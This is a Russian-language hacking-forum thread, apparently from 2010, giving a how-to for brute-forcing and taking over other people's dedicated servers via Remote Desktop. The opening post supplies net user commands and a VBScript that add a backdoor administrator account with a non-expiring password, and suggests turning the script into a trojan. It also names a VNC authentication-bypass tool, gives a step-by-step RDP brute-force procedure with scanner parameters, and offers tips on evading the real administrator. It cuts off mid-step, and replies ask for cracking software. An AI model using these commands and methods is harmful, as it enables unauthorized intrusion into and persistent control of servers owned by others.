FAQ по бруту дедиков (dedicated servers) + софт!

Тема в разделе "АНОНИМНОСТЬ В ИНТЕРНЕТЕ", создана пользователем Audi, 7 фев 2010.

  1. Audi

    Audi Member

    Сообщения:
    67
    Симпатии:
    0
    Коротко о дедах (небольшой manual):

    Что такое дедик?
    Дедик - слово, которое пошло от английского слова dedicated, что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.

    Как зайти не дедик?
    Подключиться к дедику можно с помошью встроеного в ОС windows утилиты: Подключение к удаленному рабочему столу. Пуск => Программы => Стандартные => Связь => Подключение к удаленному рабочему столу. Можно еще так: Пуск => Выполнить => mstsc. Еще одно утилита для подключение к дедику - это [BL4CK] VNC Viewer: Authentication Bypass. Просто запусти ее и вводи ip адрес дедика. Можно еще Радмином юзать дедик если он установлен на дедике.

    Как создать нового пользователя?
    Нажмите Win-R, вводим cmd.exe, туда через Clipboard копируем следующие строки
    PHP:
    net user имя пароль /add
    net localgroup Administrators имя
    /add
    net localgroup
    "Remote Desktop Users" имя /add
    net accounts
    /maxpwage:unlimited
    exit

    На специфичных дедах типа Китая, Германии, Иордании, Австрии, Болгарии для определения групы Администраторов (куда нам надо добавится), используем команду net localgroup. Группы администраторов могут иметь имя Администраторы, Administradores, Administrateur и прочее.
    Альтернатива создание пользователя, локального администраторачерез VBscript. Текст скопировать в текстовый файлик, переименовать текстовый файлик в *.vbs .
    Скрипт создает локального пользователя LocalAdmin с паролем 123456789
    PHP:
    Set objNetwork = CreateObject("WScript.Network")
    strComputer = objNetwork.ComputerName

    Set colAccounts
    = GetObject("WinNT://" & strComputer & "")
    Set objUser = colAccounts.Create("user", "LocalAdmin")
    objUser.SetPassword "123456789"
    objUser.SetInfo

    Set objGroup
    = GetObject("WinNT://" & strComputer & "/Администраторы,group")
    Set objUser = GetObject("WinNT://" & strComputer & "/LocalAdmin,user")
    objGroup.Add(objUser.ADsPath)

    Const
    ADS_UF_DONT_EXPIRE_PASSWD = &h10000
    UserFlags
    = objUser.Get("UserFlags")
    objPasswordExpirationFlag = UserFlags OR ADS_UF_DONT_EXPIRE_PASSWD
    objUser
    .Put "userFlags", objPasswordExpirationFlag
    objUser
    .SetInfo

    Преимущество скрипта - его можно превратить в трой, создающий юзера. Утилит превращения vbs в exe множество - за ними в Гугл.

    Как проверить, сидит ли админ за сервером?
    Проверить можно так: в Диспетчере задач на последней вкладке смотрим, кто за компом, есть ли сессия Console. Если нет - гуд, иначе - смотрим все задачи, если там есть logon.scr - значит сейчас активна заставка у админа, (часто они не отключают заставку), если нет её - знач надо быть оч акrуратным, сессия мб активна. Еще можно в tsadmin посмотреть, когда кто загружен.

    Как залить файлы на дедик?
    1. Залей на ФТП мазилу. На какой FTP можно залить файлы? - _http://www.pochta.ru - что-то вроде этого получается ftp : //user.nm.ru @ ftp2.nm.ru/ вводишь свой пароль и вуаля.
    2. Когда через mstsc подключаешься,в опциях можно подключить свой винт, кардинально - но скопируешь что надо, потом заливай туда портабельную оперу или лисицу и сиди через них, хотя это когда тупо запрещен доступ в ие, если дело хуже - если нет корпоративного проксика - заливай софт, какой думаешь юзать и юзай, если есть проксик - забей или ищи способ узнать проксики, хотя такой запущенный способ пару раз видел.
    П.С. Винт будет виден всем, кто за компом будет, так что скопировал/отключился, вырубил винт. Минимум времени чтобы. Сетевой диск вариант, но надо пояс просчитывать и ночи ждать на деде. Eсли ссылки не открываются то ты в поставь галочку Дисковые устройства в свойствах подключения к удаленному рабочему столу на вкладке Локальные ресурсы, тогда на дедике в моем компьютере появятся твои диски. (Mstsc -- параметры --- локальные рессурсы -- дисковые устройства)


    Действовать нужно быстро, иначе спалят ваши похождения на деде

    Безопасно ли заходить на дед?
    Ответ прост - вы подключаетесь в чужому компьютеру. Это незаконно. Просто используйте proxy, socks (не через браузер, а через систему), а лучше vpn.

    Как брутить дедики?

    Что нужно для брута?

    1. Нужен сканер VNC_Byauth
    2. Нужен tss-brute.exe, который идёт вместе с брутом от спайдера,
    3. Нужен скрипт на PHP для генерации BAT файлов
    4. Прога от RankroR'a для выдирания гудов

    По шагам:

    1. Открывае cmd.exe (WIN+R), запускаем VNC_Byauth c параметрами -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy -p 3389 -cT -T Кол-во потоков

    2. После того как сканер просканил смотрим его лог в блокноте , удаляем из списка :3389 порт оставив просто список IP адресов.

    3. Ставим мой скрипт на хост или на localhost и вставляем туда наши айпишнеги и другие данные.

    4. После того как скрипт выполнил своё дело создаём в папке с нашим tss-brute.exe , BAT файл и вставляем в него результат полученый после выполнения скрипта.

    5. Заходим в файл smclient.ini который шол вместе с tss-brute.exe и вставляем туда такой конфиг
  2. Chik@go

    Chik@go Member

    Сообщения:
    205
    Симпатии:
    0
    Статейка очень помогла как раз нужен был брут.
  3. aka_k4

    aka_k4 Member

    Сообщения:
    403
    Симпатии:
    0
    cRACC залейте пожалусто ибо на сайт не заходит
  4. Chik@go

    Chik@go Member

    Сообщения:
    205
    Симпатии:
    0

Поделиться этой страницей